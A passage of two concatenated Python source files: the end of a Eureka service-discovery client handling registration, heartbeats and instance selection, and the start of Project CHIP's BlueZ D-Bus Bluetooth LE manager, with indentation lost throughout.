# instance metadata
amazon_info = AmazonInfo()
mac = amazon_info.get_ec2_metadata("mac")
if mac:
vpc_id = amazon_info.get_ec2_metadata(
f"network/interfaces/macs/{mac}/vpc-id"
)
else:
vpc_id = ""
metadata = {
"instance-id": amazon_info.get_ec2_metadata("instance-id"),
"ami-id": amazon_info.get_ec2_metadata("ami-id"),
"instance-type": amazon_info.get_ec2_metadata("instance-type"),
"local-ipv4": amazon_info.get_ec2_metadata("local-ipv4"),
"local-hostname": amazon_info.get_ec2_metadata("local-hostname"),
"availability-zone": amazon_info.get_ec2_metadata(
"placement/availability-zone", ignore_error=True
),
"public-hostname": amazon_info.get_ec2_metadata(
"public-hostname", ignore_error=True
),
"public-ipv4": amazon_info.get_ec2_metadata(
"public-ipv4", ignore_error=True
),
"mac": mac,
"vpcId": vpc_id,
}
# accountId
doc = amazon_info.get_instance_identity_document()
if doc and "accountId" in doc:
metadata["accountId"] = doc["accountId"]
return metadata
@property
def should_register(self) -> bool:
return self.__should_register
@property
def should_discover(self) -> bool:
return self.__should_discover
@property
def zone(self) -> str:
return self.__eureka_server_conf.zone
@property
def applications(self) -> application.Applications:
if not self.should_discover:
raise exceptions.DiscoverException(
"should_discover set to False, no registry is pulled, cannot find any applications."
)
with self.__application_mth_lock:
if self.__applications is None:
self.__pull_full_registry()
return self.__applications
def __try_eureka_server_in_cache(self, fun):
ok = False
invalid_keys = []
for z, url in self.__cache_eureka_url.items():
try:
_logger.debug(
f"Try to do {fun.__name__} in zone[{z}] using cached url {url}. "
)
fun(url)
except (http_client.HTTPError, http_client.URLError):
_logger.warn(
f"Eureka server [{url}] is down, use next url to try.",
exc_info=True,
)
invalid_keys.append(z)
else:
ok = True
if invalid_keys:
_logger.debug(f"Invalid keys::{invalid_keys} will be removed from cache.")
for z in invalid_keys:
del self.__cache_eureka_url[z]
if not ok:
raise exceptions.EurekaServerConnectionException(
"All eureka servers in cache are down!"
)
def __try_eureka_server_in_zone(self, fun):
self.__try_eureka_servers_in_list(
fun, self.__eureka_server_conf.servers_in_zone, self.zone
)
def __try_eureka_server_not_in_zone(self, fun):
for zone, urls in self.__eureka_server_conf.servers_not_in_zone.items():
try:
self.__try_eureka_servers_in_list(fun, urls, zone)
except exceptions.EurekaServerConnectionException:
_logger.warn(
f"try eureka servers in zone[{zone}] error!", exc_info=True
)
else:
return
raise exceptions.EurekaServerConnectionException(
"All eureka servers in all zone are down!"
)
def __try_eureka_server_regardless_zones(self, fun):
for zone, urls in self.__eureka_server_conf.servers.items():
try:
self.__try_eureka_servers_in_list(fun, urls, zone)
except exceptions.EurekaServerConnectionException:
_logger.warn(
f"try eureka servers in zone[{zone}] error!", exc_info=True
)
else:
return
raise exceptions.EurekaServerConnectionException(
"All eureka servers in all zone are down!"
)
def __try_all_eureka_servers(self, fun):
if self.__prefer_same_zone:
try:
self.__try_eureka_server_in_zone(fun)
except exceptions.EurekaServerConnectionException:
self.__try_eureka_server_not_in_zone(fun)
else:
self.__try_eureka_server_regardless_zones(fun)
def __try_eureka_servers_in_list(
self, fun, eureka_servers=[], zone=constants.Constant.DEFAULT_ZONE
):
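# The first reachable server of each zone is remembered in __cache_eureka_url
# so later calls can skip the probing; a cached entry is dropped again as soon
# as that server fails (see __try_eureka_server_in_cache).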
with self.__net_lock:
ok = False
_zone = zone if zone else constants.Constant.DEFAULT_ZONE
for url in eureka_servers:
url = url.strip()
try:
_logger.debug(
f"try to do {fun.__name__} in zone[{_zone}] using url {url}. "
)
fun(url)
except (http_client.HTTPError, http_client.URLError):
_logger.warn(
f"Eureka server [{url}] is down, use next url to try.",
exc_info=True,
)
else:
ok = True
self.__cache_eureka_url[_zone] = url
break
if not ok:
if _zone in self.__cache_eureka_url:
del self.__cache_eureka_url[_zone]
raise exceptions.EurekaServerConnectionException(
f"All eureka servers in zone[{_zone}] are down!"
)
def __connect_to_eureka_server(self, fun):
if self.__cache_eureka_url:
try:
self.__try_eureka_server_in_cache(fun)
except exceptions.EurekaServerConnectionException:
self.__try_all_eureka_servers(fun)
else:
self.__try_all_eureka_servers(fun)
@staticmethod
def __format_url(url, host, port, default_ctx=""):
if url != "":
if url.startswith("http"):
_url = url
elif url.startswith("/"):
_url = f"http://{host}:{port}{url}"
else:
_url = f"http://{host}:{port}/{url}"
else:
_url = f"http://{host}:{port}/{default_ctx}"
return _url
@staticmethod
def __is_ip(ip_str):
return re.match(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$", ip_str)
@staticmethod
def __get_instance_ip(eureka_server):
url_obj = http_client.parse_url(eureka_server)
target_ip = url_obj["host"]
target_port = url_obj["port"]
if target_port is None:
if url_obj["schema"] == "http":
target_port = 80
else:
target_port = 443
if url_obj["ipv6"] is not None:
target_ip = url_obj["ipv6"]
socket_family = socket.AF_INET6
else:
socket_family = socket.AF_INET
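# Open a UDP "connection" towards the eureka server: no packet is actually
# sent, but the OS selects the local interface that routes to it, and its
# address is reported as this instance's ip.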
s = socket.socket(socket_family, socket.SOCK_DGRAM)
s.connect((target_ip, target_port))
ip = s.getsockname()[0]
s.close()
return ip
def _on_error(self, error_type: str, exception: Exception):
if self.__on_error_callback and callable(self.__on_error_callback):
self.__on_error_callback(error_type, exception)
def register(
self,
status: str = constants.InstanceStatus.INSTANCE_STATUS_UP,
overriddenstatus: str = constants.InstanceStatus.INSTANCE_STATUS_UNKNOWN,
) -> None:
self.__instance["status"] = status
self.__instance["overriddenstatus"] = overriddenstatus
self.__instance["lastUpdatedTimestamp"] = str(util.current_time_millis())
self.__instance["lastDirtyTimestamp"] = str(util.current_time_millis())
try:
def do_register(url):
registry.send_registry(url, self.__instance)
self.__connect_to_eureka_server(do_register)
except Exception as e:
self.__alive = False
_logger.warn("Register error! Will try in next heartbeat. ", exc_info=True)
self._on_error(constants.ErrorTypes.ERROR_REGISTER, e)
else:
_logger.debug("register successfully!")
self.__alive = True
def cancel(self) -> None:
try:
def do_cancel(url):
registry.cancel(
url, self.__instance["app"], self.__instance["instanceId"]
)
self.__connect_to_eureka_server(do_cancel)
except Exception as e:
_logger.warn("Cancel error!", exc_info=True)
self._on_error(constants.ErrorTypes.ERROR_STATUS_UPDATE, e)
else:
self.__alive = False
def send_heartbeat(self, overridden_status: str = "") -> None:
if not self.__alive:
self.register()
return
try:
_logger.debug("sending heartbeat to eureka server. ")
def do_send_heartbeat(url):
registry.send_heartbeat(
url,
self.__instance["app"],
self.__instance["instanceId"],
self.__instance["lastDirtyTimestamp"],
status=self.__instance["status"],
overriddenstatus=overridden_status,
)
self.__connect_to_eureka_server(do_send_heartbeat)
except Exception as e:
_logger.warn(
"Cannot send heartbeat to server, try to register. ", exc_info=True
)
self._on_error(constants.ErrorTypes.ERROR_STATUS_UPDATE, e)
self.register()
def status_update(self, new_status: str) -> None:
self.__instance["status"] = new_status
try:
def do_status_update(url):
registry.status_update(
url,
self.__instance["app"],
self.__instance["instanceId"],
self.__instance["lastDirtyTimestamp"],
new_status,
)
self.__connect_to_eureka_server(do_status_update)
except Exception as e:
_logger.warn("update status error!", exc_info=True)
self._on_error(constants.ErrorTypes.ERROR_STATUS_UPDATE, e)
def delete_status_override(self) -> None:
try:
self.__connect_to_eureka_server(
lambda url: registry.delete_status_override(
url,
self.__instance["app"],
self.__instance["instanceId"],
self.__instance["lastDirtyTimestamp"],
)
)
except Exception as e:
_logger.warn("delete status overrid error!", exc_info=True)
self._on_error(constants.ErrorTypes.ERROR_STATUS_UPDATE, e)
def __start_register(self):
_logger.debug("start to registry client...")
self.register()
def __stop_registery(self):
if self.__alive:
self.register(status=constants.InstanceStatus.INSTANCE_STATUS_DOWN)
self.cancel()
def __heartbeat(self):
while True:
if self.__should_register:
_logger.debug("sending heartbeat to eureka server ")
self.send_heartbeat()
if self.__should_discover:
_logger.debug("loading services from eureka server")
self.__fetch_delta()
time.sleep(self.__heartbeat_interval)
def __pull_full_registry(self):
def do_pull(url):
self.__applications = util.get_applications(url, self.__remote_regions)
self.__delta = self.__applications
try:
self.__connect_to_eureka_server(do_pull)
except Exception as e:
_logger.warn("pull full registry from eureka server error!", exc_info=True)
self._on_error(constants.ErrorTypes.ERROR_DISCOVER, e)
def __fetch_delta(self):
def do_fetch(url):
if (
self.__applications is None
or len(self.__applications.applications) == 0
):
self.__pull_full_registry()
return
delta = util.get_delta(url, self.__remote_regions)
_logger.debug(f"delta got: v.{delta.versionsDelta}::{delta.appsHashcode}")
if (
self.__delta is not None
and delta.versionsDelta == self.__delta.versionsDelta
and delta.appsHashcode == self.__delta.appsHashcode
):
return
self.__merge_delta(delta)
self.__delta = delta
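# If the hash computed from the merged local registry no longer matches the
# hash reported by the server, the delta is assumed to have diverged and a
# full registry pull is done instead.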
if not self.__is_hash_match():
self.__pull_full_registry()
try:
self.__connect_to_eureka_server(do_fetch)
except Exception as e:
_logger.warn("fetch delta from eureka server error!", exc_info=True)
self._on_error(constants.ErrorTypes.ERROR_DISCOVER, e)
def __is_hash_match(self):
app_hash = self.__get_applications_hash()
_logger.debug(
f"check hash, local[{app_hash}], remote[{self.__delta.appsHashcode}]"
)
return app_hash == self.__delta.appsHashcode
def __merge_delta(self, delta):
_logger.debug(
f"merge delta...length of application got from delta::{len(delta.applications)}"
)
for application in delta.applications:
for instance in application.instances:
_logger.debug(
f"instance [{instance.instanceId}] has {instance.actionType}"
)
if instance.actionType in (
constants.ActionType.ACTION_TYPE_ADDED,
constants.ActionType.ACTION_TYPE_MODIFIED,
):
existingApp = self.applications.get_application(application.name)
if existingApp is None:
self.applications.add_application(application)
else:
existingApp.update_instance(instance)
elif instance.actionType == constants.ActionType.ACTION_TYPE_DELETED:
existingApp = self.applications.get_application(application.name)
if existingApp is None:
self.applications.add_application(application)
existingApp = self.applications.get_application(application.name)
existingApp.remove_instance(instance)
def __get_applications_hash(self):
app_hash = ""
app_status_count = {}
for application in self.__applications.applications:
for instance in application.instances:
if instance.status.upper() not in app_status_count:
app_status_count[instance.status.upper()] = 0
app_status_count[instance.status.upper()] = (
app_status_count[instance.status.upper()] + 1
)
sorted_app_status_count = sorted(
app_status_count.items(), key=lambda item: item[0]
)
for item in sorted_app_status_count:
app_hash = f"{app_hash}{item[0]}_{item[1]}_"
return app_hash
def walk_nodes_async(
self,
app_name: str = "",
service: str = "",
prefer_ip: bool = False,
prefer_https: bool = False,
walker: Callable = None,
on_success: Callable = None,
on_error: Callable = None,
) -> None:
def async_thread_target():
try:
res = self.walk_nodes(
app_name=app_name,
service=service,
prefer_ip=prefer_ip,
prefer_https=prefer_https,
walker=walker,
)
if on_success is not None and (
inspect.isfunction(on_success) or inspect.ismethod(on_success)
):
on_success(res)
except http_client.HTTPError as e:
if on_error is not None and (
inspect.isfunction(on_error) or inspect.ismethod(on_error)
):
on_error(e)
async_thread = Thread(target=async_thread_target)
async_thread.daemon = True
async_thread.start()
def walk_nodes(
self,
app_name: str = "",
service: str = "",
prefer_ip: bool = False,
prefer_https: bool = False,
walker: Callable = None,
) -> Union[str, Dict, http_client.HTTPResponse]:
assert (
app_name is not None and app_name != ""
), "application_name should not be null"
assert inspect.isfunction(walker) or inspect.ismethod(
walker
), "walker must be a method or function"
error_nodes = []
app_name = app_name.upper()
node = self.__get_available_service(app_name)
while node is not None:
try:
url = self.__generate_service_url(node, prefer_ip, prefer_https)
if service.startswith("/"):
url = url + service[1:]
else:
url = url + service
_logger.debug("do service with url::" + url)
return walker(url)
except (http_client.HTTPError, http_client.URLError):
_logger.warn(
f"do service {service} in node [{node.instanceId}] error, use next node."
)
error_nodes.append(node.instanceId)
node = self.__get_available_service(app_name, error_nodes)
raise http_client.URLError("Tried all up instances in the registry, but all failed")
def do_service_async(
self,
app_name: str = "",
service: str = "",
return_type: str = "string",
prefer_ip: bool = False,
prefer_https: bool = False,
on_success: Callable = None,
on_error: Callable = None,
method: str = "GET",
headers: Dict[str, str] = None,
data: Union[bytes, str, Dict] = None,
timeout: float = constants.Constant.DEFAULT_TIME_OUT,
cafile: str = None,
capath: str = None,
cadefault: bool = False,
context: ssl.SSLContext = None,
) -> None:
def async_thread_target():
try:
res = self.do_service(
app_name=app_name,
service=service,
return_type=return_type,
prefer_ip=prefer_ip,
prefer_https=prefer_https,
method=method,
headers=headers,
data=data,
timeout=timeout,
cafile=cafile,
capath=capath,
cadefault=cadefault,
context=context,
)
if on_success is not None and (
inspect.isfunction(on_success) or inspect.ismethod(on_success)
):
on_success(res)
except http_client.HTTPError as e:
if on_error is not None and (
inspect.isfunction(on_error) or inspect.ismethod(on_error)
):
on_error(e)
async_thread = Thread(target=async_thread_target)
async_thread.daemon = True
async_thread.start()
def do_service(
self,
app_name: str = "",
service: str = "",
return_type: str = "string",
prefer_ip: bool = False,
prefer_https: bool = False,
method: str = "GET",
headers: Dict[str, str] = None,
data: Union[bytes, str, Dict] = None,
timeout: float = constants.Constant.DEFAULT_TIME_OUT,
cafile: str = None,
capath: str = None,
cadefault: bool = False,
context: ssl.SSLContext = None,
) -> Union[str, Dict, http_client.HTTPResponse]:
_data: bytes
if data and isinstance(data, dict):
_data = json.dumps(data).encode()
elif data and isinstance(data, str):
_data = data.encode()
else:
_data = data
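# The walker passed to walk_nodes below: it performs the HTTP request against
# a single node's url; walk_nodes retries it on the next node if it raises an
# HTTP/URL error.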
def walk_using_urllib(url):
req = http_client.Request(url, method=method)
heads = headers if headers is not None else {}
for k, v in heads.items():
req.add_header(k, v)
res_txt, res = http_client.load(
req,
data=_data,
timeout=timeout,
cafile=cafile,
capath=capath,
cadefault=cadefault,
context=context,
)
if return_type.lower() in ("json", "dict", "dictionary"):
return json.loads(res_txt)
elif return_type.lower() == "response_object":
return res
else:
return res_txt
return self.walk_nodes(
app_name, service, prefer_ip, prefer_https, walk_using_urllib
)
def __get_service_not_in_ignore_list(self, instances, ignores):
ign = ignores if ignores else []
return [item for item in instances if item.instanceId not in ign]
def __get_available_service(self, application_name, ignore_instance_ids=None):
apps = self.applications
if not apps:
raise exceptions.DiscoverException(
"Cannot load registry from eureka server, please check your configurations. "
)
app = apps.get_application(application_name)
if app is None:
return None
up_instances = []
if self.__prefer_same_zone:
ups_same_zone = app.up_instances_in_zone(self.zone)
up_instances = self.__get_service_not_in_ignore_list(
ups_same_zone, ignore_instance_ids
)
if not up_instances:
ups_not_same_zone = app.up_instances_not_in_zone(self.zone)
_logger.debug(
f"app[{application_name}]'s up instances not in same zone are all down, using the one that's not in the same zone: {[ins.instanceId for ins in ups_not_same_zone]}"
)
up_instances = self.__get_service_not_in_ignore_list(
ups_not_same_zone, ignore_instance_ids
)
else:
up_instances = self.__get_service_not_in_ignore_list(
app.up_instances, ignore_instance_ids
)
if len(up_instances) == 0:
# no up instances
return None
elif len(up_instances) == 1:
# only one available instance, so it doesn't matter which strategy is used.
instance = up_instances[0]
self.__ha_cache[application_name] = instance.instanceId
return instance
def random_one(instances):
if len(instances) == 1:
idx = 0
else:
idx = random.randint(0, len(instances) - 1)
selected_instance = instances[idx]
self.__ha_cache[application_name] = selected_instance.instanceId
return selected_instance
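# HA_STRATEGY_RANDOM: pick any up instance at random.
# HA_STRATEGY_STICK: keep returning the cached instance while it stays UP.
# HA_STRATEGY_OTHER: prefer an instance different from the cached one.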
if self.__ha_strategy == constants.HAStrategy.HA_STRATEGY_RANDOM:
return random_one(up_instances)
elif self.__ha_strategy == constants.HAStrategy.HA_STRATEGY_STICK:
if application_name in self.__ha_cache:
cache_id = self.__ha_cache[application_name]
cache_instance = app.get_instance(cache_id)
if (
cache_instance is not None
and cache_instance.status
== constants.InstanceStatus.INSTANCE_STATUS_UP
):
return cache_instance
else:
return random_one(up_instances)
else:
return random_one(up_instances)
elif self.__ha_strategy == constants.HAStrategy.HA_STRATEGY_OTHER:
if application_name in self.__ha_cache:
cache_id = self.__ha_cache[application_name]
other_instances = []
for up_instance in up_instances:
if up_instance.instanceId != cache_id:
other_instances.append(up_instance)
return random_one(other_instances)
else:
return random_one(up_instances)
else:
return None
def __generate_service_url(self, instance, prefer_ip, prefer_https) -> str:
if instance is None:
raise exceptions.InstanceDoesNotExistError(
instance,
"Could not generate service URL, since instance does not exist!",
)
schema = "http"
port = 0
if instance.port.port and not instance.securePort.enabled:
schema = "http"
port = instance.port.port
elif not instance.port.port and instance.securePort.enabled:
schema = "https"
port = instance.securePort.port
elif instance.port.port and instance.securePort.enabled:
if prefer_https:
schema = "https"
port = instance.securePort.port
else:
schema = "http"
port = instance.port.port
else:
assert False, "generate_service_url error: No port is available"
host = instance.ipAddr if prefer_ip else instance.hostName
return f"{schema}://{host}:{port}/"
def __start_discover(self):
self.__pull_full_registry()
def start(self) -> None:
if self.should_register:
self.__start_register()
if self.should_discover:
self.__start_discover()
self.__heartbeat_timer.start()
def stop(self) -> None:
if self.__heartbeat_timer.is_alive():
self.__heartbeat_timer.cancel()
if self.__should_register:
self.__stop_registery()
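# A minimal lifecycle sketch (illustrative only, not part of the library: it
# assumes a Eureka server reachable at the url below, and the names used here
# are placeholders):
if __name__ == "__main__":
demo_client = EurekaClient(
eureka_server="http://localhost:8761/eureka",
app_name="demo_service",
instance_port=9090,
)
demo_client.start()  # register (if enabled) and start the heartbeat loop
try:
time.sleep(60)  # keep the instance registered for a minute
finally:
demo_client.stop()  # cancel the heartbeat and deregister the instance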
|
ChipBluezMgr.py
|
#
# Copyright (c) 2020 Project CHIP Authors
# Copyright (c) 2019-2020 Google LLC.
# Copyright (c) 2015-2018 Nest Labs, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# @file
# BLE Central support for Chip Device Manager via BlueZ APIs.
#
from __future__ import absolute_import
from __future__ import print_function
import dbus
import dbus.service
import dbus.mainloop.glib
import logging
import sys
import threading
import time
import traceback
import uuid
import queue
from ctypes import *
try:
from gi.repository import GObject
except Exception as ex:
logging.exception("Unable to find GObject from gi.repository")
from pgi.repository import GObject
from .ChipBleUtility import (
BLE_ERROR_REMOTE_DEVICE_DISCONNECTED,
BleDisconnectEvent,
ParseServiceData,
)
from .ChipBleBase import ChipBleBase
chip_service = uuid.UUID("0000FFF6-0000-1000-8000-00805F9B34FB")
chip_tx = uuid.UUID("18EE2EF5-263D-4559-959F-4F9C429F9D11")
chip_rx = uuid.UUID("18EE2EF5-263D-4559-959F-4F9C429F9D12")
chip_service_short = uuid.UUID("0000FFF6-0000-0000-0000-000000000000")
chromecast_setup_service = uuid.UUID("0000FEA0-0000-1000-8000-00805F9B34FB")
chromecast_setup_service_short = uuid.UUID(
"0000FEA0-0000-0000-0000-000000000000")
BLUEZ_NAME = "org.bluez"
ADAPTER_INTERFACE = BLUEZ_NAME + ".Adapter1"
DEVICE_INTERFACE = BLUEZ_NAME + ".Device1"
SERVICE_INTERFACE = BLUEZ_NAME + ".GattService1"
CHARACTERISTIC_INTERFACE = BLUEZ_NAME + ".GattCharacteristic1"
DBUS_PROPERTIES = "org.freedesktop.DBus.Properties"
BLE_SCAN_CONNECT_GUARD_SEC = 2.0
BLE_STATUS_TRANSITION_TIMEOUT_SEC = 5.0
BLE_CONNECT_TIMEOUT_SEC = 15.0
BLE_SERVICE_DISCOVERY_TIMEOUT_SEC = 5.0
BLE_CHAR_DISCOVERY_TIMEOUT_SEC = 5.0
BLE_SUBSCRIBE_TIMEOUT_SEC = 5.0
BLE_WRITE_CHARACTERISTIC_TIMEOUT_SEC = 10.0
BLE_IDLE_DELTA = 0.1
def get_bluez_objects(bluez, bus, interface, prefix_path):
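# Enumerate BlueZ's D-Bus managed objects that implement `interface` and whose
# object path starts with `prefix_path`, returning a list of dicts holding the
# proxy object and its path.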
results = []
if bluez is None or bus is None or interface is None or prefix_path is None:
return results
for item in bluez.GetManagedObjects().items():
delegates = item[1].get(interface)
if not delegates:
continue
slice = {}
if item[0].startswith(prefix_path):
slice["object"] = bus.get_object(BLUEZ_NAME, item[0])
slice["path"] = item[0]
results.append(slice)
return results
class BluezDbusAdapter:
def __init__(self, bluez_obj, bluez, bus, logger=None):
self.logger = logger if logger else logging.getLogger("ChipBLEMgr")
self.object = bluez_obj
self.adapter = dbus.Interface(bluez_obj, ADAPTER_INTERFACE)
self.adapter_properties = dbus.Interface(bluez_obj, DBUS_PROPERTIES)
self.adapter_event = threading.Event()
self.bluez = bluez
self.bus = bus
self.path = self.adapter.object_path
self.signalReceiver = None
def __del__(self):
self.destroy()
def destroy(self):
self.logger.debug("destroy adapter")
self.adapter_unregister_signal()
self.adapter = None
self.adapter_properties = None
self.adapter_event.clear()
self.bluez = None
self.bus = None
self.object = None
self.path = None
self.signalReceiver = None
def adapter_register_signal(self):
if self.signalReceiver is None:
self.logger.debug("add adapter signal")
self.signalReceiver = self.bus.add_signal_receiver(
self.adapter_on_prop_changed_cb,
bus_name=BLUEZ_NAME,
dbus_interface=DBUS_PROPERTIES,
signal_name="PropertiesChanged",
path=self.path,
)
def adapter_unregister_signal(self):
if self.signalReceiver is not None:
self.logger.debug(" remove adapter signal")
self.bus.remove_signal_receiver(
self.signalReceiver,
signal_name="PropertiesChanged",
dbus_interface="org.freedesktop.DBus.Properties",
)
def adapter_on_prop_changed_cb(
self, interface, changed_properties, invalidated_properties
):
if len(changed_properties) == 0:
self.logger.debug("changed_properties is empty")
return
if len(invalidated_properties) > 0:
self.logger.debug(
"invalidated_properties is not empty %s" % str(
invalidated_properties)
)
return
if interface == ADAPTER_INTERFACE:
if "Discovering" in changed_properties:
self.adapter_event.set()
def adapter_bg_scan(self, enable):
self.adapter_event.clear()
action_flag = False
try:
if enable:
if not self.Discovering:
action_flag = True
self.logger.info("scanning started")
self.adapter.StartDiscovery()
else:
self.logger.info("it has started scanning")
else:
if self.Discovering:
action_flag = True
self.adapter.StopDiscovery()
self.logger.info("scanning stopped")
else:
print("it has stopped scanning")
if action_flag:
if not self.adapter_event.wait(BLE_STATUS_TRANSITION_TIMEOUT_SEC):
if enable:
self.logger.debug("scan start error")
else:
self.logger.debug("scan stop error")
self.adapter_event.clear()
except dbus.exceptions.DBusException as ex:
self.adapter_event.clear()
self.logger.debug(str(ex))
except Exception as ex:
self.logger.debug(traceback.format_exc())
@property
def Address(self):
try:
result = self.adapter_properties.Get(ADAPTER_INTERFACE, "Address")
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
@property
def UUIDs(self):
try:
return self.adapter_properties.Get(ADAPTER_INTERFACE, "UUIDs")
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
def SetDiscoveryFilter(self, filter_dict):
try:
self.adapter.SetDiscoveryFilter(filter_dict)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
except Exception as ex:
self.logger.debug(traceback.format_exc())
@property
def Discovering(self):
try:
result = self.adapter_properties.Get(
ADAPTER_INTERFACE, "Discovering")
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except Exception as ex:
self.logger.debug(traceback.format_exc())
return False
def DiscoverableTimeout(self, timeoutSec):
try:
result = self.adapter_properties.Set(
ADAPTER_INTERFACE, "DiscoverableTimeout", timeoutSec
)
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except Exception as ex:
self.logger.debug(traceback.format_exc())
return False
def Powered(self, enable):
try:
result = self.adapter_properties.Set(
ADAPTER_INTERFACE, "Powered", enable)
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except Exception as ex:
self.logger.debug(traceback.format_exc())
return False
def find_devices(self, uuids):
devices = [
BluezDbusDevice(p["object"], self.bluez, self.bus, self.logger)
for p in get_bluez_objects(
self.bluez, self.bus, DEVICE_INTERFACE, self.path
)
]
found = []
for device in devices:
for i in device.uuids:
if i in uuids:
found.append(device)
break
# Some devices do not advertise their uuid lists, thus we should also check service data.
if device.ServiceData:
for i in device.ServiceData:
if uuid.UUID(str(i)) in uuids:
found.append(device)
break
return found
def clear_adapter(self):
devices = [
BluezDbusDevice(p["object"], self.bluez, self.bus, self.logger)
for p in get_bluez_objects(
self.bluez, self.bus, DEVICE_INTERFACE, self.path
)
]
for device in devices:
try:
if device.Connected:
device.device_bg_connect(False)
self.adapter.RemoveDevice(device.device.object_path)
except Exception as ex:
pass
class BluezDbusDevice:
def __init__(self, bluez_obj, bluez, bus, logger=None):
self.logger = logger if logger else logging.getLogger("ChipBLEMgr")
self.object = bluez_obj
self.device = dbus.Interface(bluez_obj, DEVICE_INTERFACE)
self.device_properties = dbus.Interface(bluez_obj, DBUS_PROPERTIES)
self.path = self.device.object_path
self.device_event = threading.Event()
if self.Name:
try:
self.device_id = uuid.uuid3(uuid.NAMESPACE_DNS, self.Name)
except UnicodeDecodeError:
self.device_id = uuid.uuid3(
uuid.NAMESPACE_DNS, self.Name.encode("utf-8")
)
else:
self.device_id = uuid.uuid4()
self.bluez = bluez
self.bus = bus
self.signalReceiver = None
self.path = self.device.object_path
def __del__(self):
self.destroy()
def destroy(self):
self.logger.debug("destroy device")
self.device_unregister_signal()
self.device = None
self.device_properties = None
self.device_event = None
self.device_id = None
self.bluez = None
self.bus = None
self.object = None
self.signalReceiver = None
def device_register_signal(self):
if self.signalReceiver is None:
self.logger.debug("add device signal")
self.signalReceiver = self.bus.add_signal_receiver(
self.device_on_prop_changed_cb,
bus_name=BLUEZ_NAME,
dbus_interface=DBUS_PROPERTIES,
signal_name="PropertiesChanged",
path=self.path,
)
def device_unregister_signal(self):
if self.signalReceiver is not None:
self.logger.debug("remove device signal")
self.bus.remove_signal_receiver(
self.signalReceiver,
signal_name="PropertiesChanged",
dbus_interface=DBUS_PROPERTIES,
)
def device_on_prop_changed_cb(
self, interface, changed_properties, invalidated_properties
):
if len(changed_properties) == 0:
self.logger.debug("changed_properties is empty")
return
if len(invalidated_properties) > 0:
self.logger.debug(
"invalidated_properties is not empty %s" % str(
invalidated_properties)
)
return
if interface == DEVICE_INTERFACE:
if "Connected" in changed_properties:
self.device_event.set()
def device_bg_connect(self, enable):
time.sleep(BLE_SCAN_CONNECT_GUARD_SEC)
action_flag = False
self.device_event.clear()
try:
if enable:
if not self.Connected:
action_flag = True
self.device.Connect()
self.logger.info("BLE connecting")
else:
self.logger.info("BLE has connected")
else:
if self.Connected:
action_flag = True
self.device.Disconnect()
self.logger.info("BLE disconnected")
else:
self.logger.info("BLE has disconnected")
if action_flag:
if not self.device_event.wait(BLE_STATUS_TRANSITION_TIMEOUT_SEC):
if enable:
self.logger.info("BLE connect error")
else:
self.logger.info("BLE disconnect error")
self.device_event.clear()
except dbus.exceptions.DBusException as ex:
self.device_event.clear()
self.logger.info(str(ex))
except Exception as ex:
self.logger.debug(traceback.format_exc())
def service_discover(self, gatt_dic):
self.logger.info("Discovering services")
try:
expired = time.time() + BLE_SERVICE_DISCOVERY_TIMEOUT_SEC
while time.time() < expired:
if self.ServicesResolved:
services = [
BluezDbusGattService(
p["object"], self.bluez, self.bus, self.logger
)
for p in get_bluez_objects(
self.bluez, self.bus, SERVICE_INTERFACE, self.path
)
]
for service in services:
if service.uuid in gatt_dic["services"]:
self.logger.info("Service discovering success")
return service
time.sleep(BLE_IDLE_DELTA)
self.logger.error("Service discovering fail")
return None
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
@property
def uuids(self):
try:
uuids = self.device_properties.Get(DEVICE_INTERFACE, "UUIDs")
uuid_result = []
for i in uuids:
if len(str(i)) == 4:
uuid_normal = "0000%s-0000-0000-0000-000000000000" % i
else:
uuid_normal = i
uuid_result.append(uuid.UUID(str(uuid_normal)))
return uuid_result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
@property
def Address(self):
try:
return self.device_properties.Get(DEVICE_INTERFACE, "Address")
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
@property
def Name(self):
try:
name = self.device_properties.Get(DEVICE_INTERFACE, "Name")
return name
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
@property
def Connected(self):
try:
result = self.device_properties.Get(DEVICE_INTERFACE, "Connected")
return bool(result)
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return False
except Exception as ex:
self.logger.debug(traceback.format_exc())
return False
@property
def TxPower(self):
try:
return self.device_properties.Get(DEVICE_INTERFACE, "TxPower")
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
@property
def RSSI(self):
try:
result = self.device_properties.Get(DEVICE_INTERFACE, "RSSI")
return result
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
@property
def Adapter(self):
try:
return self.device_properties.Get(DEVICE_INTERFACE, "Adapter")
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
@property
def ServiceData(self):
try:
return self.device_properties.Get(DEVICE_INTERFACE, "ServiceData")
except dbus.exceptions.DBusException as ex:
self.logger.debug(str(ex))
return None
except Exception as ex:
self.logger.debug(traceback.format_exc())
return None
@property
def ServicesResolved(self):
try:
